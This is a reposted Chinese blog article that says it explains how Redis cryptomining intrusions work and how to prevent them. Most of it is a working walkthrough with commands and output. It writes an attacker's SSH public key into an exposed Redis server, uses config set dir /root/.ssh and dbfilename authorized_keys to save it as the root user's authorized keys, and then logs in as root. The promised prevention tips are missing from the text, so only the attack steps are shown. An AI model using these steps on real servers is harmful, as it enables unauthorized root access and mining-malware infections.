• 技术文章 >数据库 >Redis

    浅析Redis挖矿原理,看看如何预防(技巧分享)

    青灯夜游青灯夜游2022-01-11 18:49:46转载102
    本篇文章带大家聊聊Redis挖矿原理,看看如何预防,分享一下防范的技巧,希望对大家有所帮助!

    笔者也曾经被挖矿病毒侵袭过,灰常难受,但是其实你只要了解入侵的手段就非常好防范了,今天我们就演示一下如果通过Redis进行提权获取远程服务器的Root用户。【相关推荐:Redis视频教程

    1、首先我们需要一些先决条件

    2、开始搞事情

    通过ssh-keygen生成一对,当然可以使用已经有的都没有问题。

    root@kali:/usr/local/src# ssh-keygen 
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

    接下来通过公钥生成攻击键值

    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

    内容如下

    root@kali:/tmp/rediskey# cat foo.txt 
    
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

    这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

    操作如下:

    root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
    OK

    登录Redis进行检查,是否已经写入进Redis中。

    root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
    192.168.243.129:6379> get bar
    "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"

    且看如下操作

    192.168.243.129:6379> config set dir /root/.ssh
    OK
    192.168.243.129:6379> config get dir
    1) "dir"
    2) "/root/.ssh"
    192.168.243.129:6379> config set dbfilename "authorized_keys"
    OK
    192.168.243.129:6379> save
    OK
    192.168.243.129:6379> exit

    这个时候,我们登录远程主机看下效果。

    root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
    The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
    ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
    Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
    
    Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
    root@kali:~# w

    OK,到这里我们已经提权成功了,那我们看下导出文件到底是什么呢?其实就是Redis的保存文件形式罢了,有兴趣可以自己打开看看,这里不再展示。

    3、如何预防

    这个漏洞威力还是挺大的,我们现在只是拿到主机权限一个而已,加入放到定时任务执行一些脚本然后在批量感染呢?

    防范的技巧如下:

    做到如上三点防范Redis挖矿,没问题的

    更多编程相关知识,请访问:编程入门!!

    以上就是浅析Redis挖矿原理,看看如何预防(技巧分享)的详细内容,更多请关注php中文网其它相关文章!

    声明:本文转载于:博客园,如有侵犯,请联系admin@php.cn删除
    专题推荐:Redis 挖矿 预防
    上一篇:聊聊redis中多样的数据类型,以及集群相关的知识 下一篇:聊聊Redis中的主从复制、哨兵、集群

    相关文章推荐

    • 聊聊Redis中的GEO地理位置模块• 详细解析Redis中的持久化机制• 一文聊聊Redis中的限流策略• 聊聊redis中的hash数据类型,如何操作?• PHP+Redis缓存技术一览【步骤】• PHP+Redis解决缓存击穿的实际问题• 聊聊redis中多样的数据类型,以及集群相关的知识

    全部评论我要评论

  • 取消发布评论发送
  • 1/1

    PHP中文网